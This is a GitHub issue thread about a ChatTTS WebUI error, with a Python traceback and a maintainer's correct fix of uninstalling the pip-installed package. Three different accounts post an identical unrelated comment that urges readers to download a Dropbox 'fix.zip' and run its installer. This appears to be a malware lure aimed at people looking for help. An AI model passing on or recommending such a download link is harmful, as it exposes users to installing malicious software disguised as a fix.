### ISSUE TITLE
运行WebUI报错

### ISSUE THREAD

**Issue by Tyler-li** [2noise/ChatTTS#720]
在默认安装情况下运行 WebUI。点击Generate后台报错，请教如何解决。谢谢！

Windows 11, python 3.11.4，报错信息如下：

```
To create a public link, set `share=True` in `launch()`.
Traceback (most recent call last):
  File "C:\Python311\Lib\site-packages\gradio\queueing.py", line 536, in process_events
    response = await route_utils.call_process_api(
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python311\Lib\site-packages\gradio\route_utils.py", line 321, in call_process_api
    output = await app.get_blocks().process_api(
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python311\Lib\site-packages\gradio\blocks.py", line 1935, in process_api
    result = await self.call_function(
             ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python311\Lib\site-packages\gradio\blocks.py", line 1520, in call_function
    prediction = await anyio.to_thread.run_sync(  # type: ignore
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python311\Lib\site-packages\anyio\to_thread.py", line 56, in run_sync
    return await get_async_backend().run_sync_in_worker_thread(
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python311\Lib\site-packages\anyio\_backends\_asyncio.py", line 2177, in run_sync_in_worker_thread
    return await future
           ^^^^^^^^^^^^
  File "C:\Python311\Lib\site-packages\anyio\_backends\_asyncio.py", line 859, in run
    result = context.run(func, *args)
             ^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python311\Lib\site-packages\gradio\utils.py", line 826, in wrapper
    response = f(*args, **kwargs)
               ^^^^^^^^^^^^^^^^^^
  File "E:\Projects\ChatTTS\examples\web\funcs.py", line 150, in refine_text
    params_refine_text=ChatTTS.Chat.RefineTextParams(
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: Chat.RefineTextParams.__init__() got an unexpected keyword argument 'manual_seed'
```

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by fumiama** [comment]
请卸载用`pip`安装的`ChatTTS`，这样才会使用当前目录的版本。

**Comment by saikaasss** [comment]
> 请卸载用安装的，这样才会使用当前目录的版本。`pip``ChatTTS`

能具体说一下吗，不太清楚你的意思

**Comment by 54853315** [comment]
> > 请卸载用安装的，这样才会使用当前目录的版本。`` pip``ChatTTS ``
> 
> 能具体说一下吗，不太清楚你的意思

`pip uninstall ChatTTS`
